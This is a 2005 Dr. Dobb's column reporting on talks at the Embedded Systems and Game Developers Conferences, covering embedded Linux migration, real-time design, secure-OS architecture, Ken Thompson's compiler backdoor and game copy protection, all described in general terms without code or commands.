Dr. Dobb's is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them. Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.


Channels ▼
RSS

Embedded Systems And Games


July, 2005: Embedded Systems And Games

Ed's an EE, PE, and author in Poughkeepsie, NY. Contact him at [email protected] with "Dr Dobbs" in the subject to avoid spam filters.


Let's start with a quiz. For each pair of lecture titles, decide which you'd prefer to attend:

  • "Basic Control Theory for the Software Engineer" or "Why You Should Have Paid Attention in Multivariate Calculus"
  • "The Joy of Real-Time Artificial Intelligence" or "Sexuality in Games: When is it Appropriate?"

Huh. Me, too.

This past March, I attended both the Embedded Systems Conference and the Game Developers Conference to see what's interesting and useful. I didn't know GDC was running just down the street, but I couldn't pass up the opportunity.

Although the GDC had much better snackage, there were remarkable overlaps between the two. Here's a look at some interesting topics presented at the conferences...

Hardware Linkages

The single, critical, defining feature of embedded software is its intimate relation with the underlying hardware. Unlike in ordinary IT-style applications programs, the exact details of I/O ports, system features, and CPU timings loom large in embedded programs. While such details can be muffled by layers of software, the fact that each embedded system is different poses significant challenges.

Michael Anderson of the PTR Group, described what's involved in "Migrating from a Legacy RTOS to Embedded Linux." Contrary to popular opinion, Linux seems to be consuming the in-house RTOS kernel end of the market rather than commercial RTOS sales, but you can tell the RTOS vendors feel the winds of change blowing through their customer base.

He observes that universities are turning out Linux-experienced programmers with lots of Java smarts, but without the least hint of embedded programming or RTOS experience. Worse, students have never learned the art of postmortem debugging ("Core dump?"), don't understand that hardware isn't just an always-reliable layer in the functional decomposition, and may never have experienced the challenges of cross-platform programming.

For example, at the IT-app (and, necessarily, Java) level, memory is a vast expanse of identical words that can be accessed without regard to the underlying hardware. The notion that reading memory incurs a finite delay that depends on whether accessing another variable has prefilled or flushed a data cache line comes as a shock.

Anderson pointed out that another factor limiting responsiveness is whether a task switch has recently flushed the Translation Lookaside Buffer (TLB) inside the CPU. The TLB speeds up the translation from virtual to physical addresses by memorizing the end result of the numerous memory accesses required to set up the mapping, a process that depends on the virtual memory context of the task. A system doing many task switches flushes its TLBs so frequently that the walk-the-tables time affects the overall performance.

That bit of esoterica constrains the overall architecture of a real-time system, because threads use the same virtual-memory context as the task that contains them. Building a multitasking system based on tasks seems like it ought to be about the same as building one on threads, but the memory access patterns are completely different. As a result, the memory performance for thread-based applications is generally much better than for task-based applications.

Isolating hardware within software abstractions is an IT-app dogma that doesn't work as well in embedded systems as it should, because embedded programs have dependencies on system aspects that simply don't appear in models developed for pure-software IT applications. Mark Gerhardt and Doug Locke, of TimeSys and Locke Consulting, respectively, described the pitfalls in "Refocusing Object-Oriented Tools for Real-Time Designs."

Their example of a software-based alarm clock showed all the usual interface specifications, from which you could certainly develop programs to both implement and use the clock. However, the clock actually spends most of its time in a state not covered by the interface specifications—running quietly, ticking off seconds.

The usual interface-centric decomposition completely misses nearly all of the clock's activity, simply because the interfaces aren't involved. Any specification omitting such a vital part of the clock's design isn't adequate to the task, which is more-or-less the state of current design tools. IT-level design largely assumes that objects (the clock) remain unchanged until activated by an API interaction.

They allow that further decomposition would detail those internal functions, but the clock's API design provides no way for external programs and users to take into account the clock's internal actions, which are assumed to be irrelevant for external users. That's true for IT-style programs and utterly false for embedded programs.

Suppose that an API function controls the clock's resolution by adjusting the tick rate. Although it's obvious that a clock ticking off seconds will burn fewer CPU cycles than a microsecond-ticking one, the API specification has no place for that side effect. Witness a classic real-time bug: Changing one parameter here mysteriously causes a timing failure in a seemingly unrelated part of the system there.

What's needed are dependency and timing charts that relate all the various tasks and functions, so that you can see which resources are in short supply. Fitting that into the standard software-development methodology can be difficult if you don't expect any problems, which seems to be the typical starting point for most developers and projects.

Information Security

Suppose that you manage to finish a small embedded systems project and release it to the world. Typically, what happens next is that folks use it, and ideally, buy lots of it. Few people care that a microcontroller runs their lamp switch and rarely does anyone hack it into doing something else.

The more capable processors found in larger projects present tempting targets, although the damage is generally limited to a single system. Even if your customer does something weird with your hardware, it might not matter as long as he and all his friends buy bunches of it: There's a thriving aftermarket of hacks for the Linksys WRT54x routers that treat it as a general-purpose 200-MHz MIPS embedded system.

Arun Subbarao of Lynuxworks presented a "Technology Overview of Secure Embedded Operating Systems," with an emphasis on large-scale projects using high-value data with stringent security requirements. The central problem is that embedded systems tend to work with real-time data that cannot be backed up and processed after a system failure, so the design must withstand attacks that corrupt or deny access to that data.

Security must be built-in during the design phase by anticipating attacks and defining policies that limit their effects. Obviously, you should know your attackers and think like they do, a difficult task for designers just trying to make the system work in the first place.

Bill Beckwith and Joseph Jacob (both from Objective Interface Systems) and Mark Vanfleet (from the NSA) described "Security for Safety Critical Distributed Embedded Systems." Basically, if you're building a secure system, you must begin from a provably secure basis: Secure layers atop an insecure base have no security at all.

They described a technique called "Multiple Independent Layers of Security" that's espoused by the NSA for high-reliability secure systems. MILS starts with a provably correct 4-KLOC microkernel running on secured hardware, then isolates chunks of functionality within separate partitions having carefully defined interfaces and a complete lack of side-channel communication. Even device drivers run in user mode to prevent system-wide corruption.

They contend that Moore's Law has invalidated the conventional wisdom that mandatory isolation incurs a severe performance penalty. A task-switching overhead that approached 100 percent in the early '90s is now 1 percent and falling; only our assumptions haven't kept pace. While that may be true for assumptions, perhaps our expectations rise even faster than the performance improvements, as witness the earlier threads-versus-tasks-versus-TLB discussion.

They do admit the difficulty of predicting attacks that can leak information from a secure system. For example, an attacker can insert code that subtly alters the timing of network packets sent to the outside world. The packet data remains unchanged and the IP addresses are always correct, but the transmission timing encodes whatever information the attacker wants. In fact, packet timing can survive passage through firewalls and VPNs on its way to the outside world, where it can be monitored en passant with little risk of detection.

As an aside, they observe that you cannot trust a VPN built on Windows, because you cannot trust any Windows software. Linux isn't much better, if only because far too much stuff happens in kernel mode, outside the normal security constraints.

Ken Thompson's notorious UNIX backdoor served as an example of why you cannot trust large-scale programs, either. Basically, Thompson created a tampered version of the Standard C compiler binary that recognized when it was compiling itself from untampered source and reinserted the tampered code. That code also recognized when the compiler processed the UNIX login command's source code and inserted binary code that accepted a fixed password known only to Thompson.

No amount of source-code scrutiny will reveal the existence of a self-reproducing tampered binary, so creating a secure system must begin with bootstrapping all the tools from provably secure binaries.

Gotcha!

Copy Protection Redux

Cracking an embedded program provides access to either the underlying hardware or the data, so that compromising the program is a means to an end rather than an end in itself. Cracking game programs, on the other hand, has become something of a team sport, with little object beyond simply cracking the code; the fact that others subsequently use the game for free seems to be regarded as a side effect.

Andres Torrubia presented "Inside the Hacker Mind" at GDC, describing the infrastructure created by the folks who penetrate game security. Much as Bill Gatliff observed at ESC/Boston, you must assume that the attackers are at least as smart as you are, have access to better tools, and have all the time and motivation in the world.

The current state of the art defeats most copy protection in less than 24 hours. That's one day from the initial release of a game on CD to the time a cracked version appears on the usual assortment of shady FTP sites. The cracked version may include a sort of reverse copy protection that masks the cracking technique and impedes the vendor's ability to protect the next CD version.

The groups doing the cracking run the games in virtual machines, both commercial and homebrew, with cloaked debuggers to step through the code. Having many eyes look at the problem works just as well in this situation as it does for debugging ordinary code.

Steven Davis from ITGlobalSecure and Rob Ellison from Macromedia presented "HackU: Beat the Hackers at Their Own Game." It was well attended, despite being scheduled against a GDC keynote address, demonstrating that many attendees have a strong need-to-know.

They start by assuming that attackers know the entire structure of both the program and its copy protection, which is a refreshing change from the usual security-by-obscurity mindset. The goal is to simply delay the eventual crack by enough time to recoup enough money to justify producing the game in the first place; they admit no game can be protected forever.

Wrapping copy protection around a program doesn't work, because after the crackers get an executable image in memory, they simply save it to a file. That method takes 24 hours and, in their view, isn't worth the effort.

The Macrovision technique is scarily simple: Replace all the integer constants in your C++ source with methods that return the same numeric value after some function-call hocus-pocus, with the side effect that not calling the procedures prevents the program from running. Interleaving copy protection with procedural code makes the copy protection very difficult to remove, while exacting only a "small" runtime performance penalty.

Removing or bypassing all those function calls takes two-to-four weeks of tedious effort and quality control, starting from initial CD availability. They find that the first crack takes 21 days, averaged across the dozen or so games and subsequent patches released so far, and a month is as long as you can expect.

Their surveys show that 75 percent of a game's potential customers would buy it within a month, if the appearance of a cracked version hadn't tempted them to steal it. About 42 percent of all game owners posses cracked games and 40 percent have more than 15 cracked games. I have my doubts about their survey methodology and suspect "collectors" with many cracked games skew the numbers, but let's run with it anyway.

Delaying the first crack by a month might, possibly, recover much of the revenue lost to cracked games. Someone in the audience asked if they had any data on their protected games to demonstrate that, but it seems there are too few games protected by their method to produce any numbers they'd like to mention. That's significant, I think.

They regard protecting console game systems as a lost cause, as the hardware is cracked within, at most, a few months. After that, the only recourse is to kick cracked boxes off the interactive network gaming servers.

The message for embedded-systems folks should be obvious. When an attacker owns the hardware, whether that's a device or a CD, they also own the code inside. Not even highly motivated and well-funded copy protection, even if you pronounce it "security," can change that result.

Reentry Checklist

Oh, yeah, about that sexuality thing. The highly pneumatic females prominently featured in the game ads festooning the GDC lobby indicate, at least to me, that sex in games is a grafted-on attractant, just like the lovingly detailed explosions. One participant suggested a video game for sex-education classes, which sounds like an interesting, albeit doomed, project.

The Embedded Systems Conference is at http://www.esconline.com/. The Game Developers Conference is at http://gdconf.com/. You'll find links to the companies on those sites.

An interesting review of 40 years of developer techniques is at http://www.ics.uci.edu/~ses/papers/hist.pdf. They observe, although not in these words, the high truth that Dilbert is a documentary.

Ken Thompson's description of his C-compiler Trojan is at http://www.acm.org/classics/sep95/. The Jargon File's "back door" entry is at http://www.catb.org/~esr/jargon/html/B/back-door.html. Remember that this happened in the Good Old Days, before such a stunt would be construed as a terrorist act.

Various CMP divisions run the Embedded Systems and Game Developers Conferences, publish the DDJ and Game Developer magazines, and paid my way at the conferences. With that in mind, I just report on what I saw.

DDJ


Related Reading


More Insights






Currently we allow the following HTML tags in comments:

Single tags

These tags can be used alone and don't need an ending tag.

<br> Defines a single line break

<hr> Defines a horizontal line

Matching tags

These require an ending tag - e.g. <i>italic text</i>

<a> Defines an anchor

<b> Defines bold text

<big> Defines big text

<blockquote> Defines a long quotation

<caption> Defines a table caption

<cite> Defines a citation

<code> Defines computer code text

<em> Defines emphasized text

<fieldset> Defines a border around elements in a form

<h1> This is heading 1

<h2> This is heading 2

<h3> This is heading 3

<h4> This is heading 4

<h5> This is heading 5

<h6> This is heading 6

<i> Defines italic text

<p> Defines a paragraph

<pre> Defines preformatted text

<q> Defines a short quotation

<samp> Defines sample computer code text

<small> Defines small text

<span> Defines a section in a document

<s> Defines strikethrough text

<strike> Defines strikethrough text

<strong> Defines strong text

<sub> Defines subscripted text

<sup> Defines superscripted text

<u> Defines underlined text

Dr. Dobb's encourages readers to engage in spirited, healthy debate, including taking us to task. However, Dr. Dobb's moderates all comments posted to our site, and reserves the right to modify or remove any content that it determines to be derogatory, offensive, inflammatory, vulgar, irrelevant/off-topic, racist or obvious marketing or spam. Dr. Dobb's further reserves the right to disable the profile of any commenter participating in said activities.

 
Disqus Tips To upload an avatar photo, first complete your Disqus profile. | View the list of supported HTML tags you can use to style comments. | Please read our commenting policy.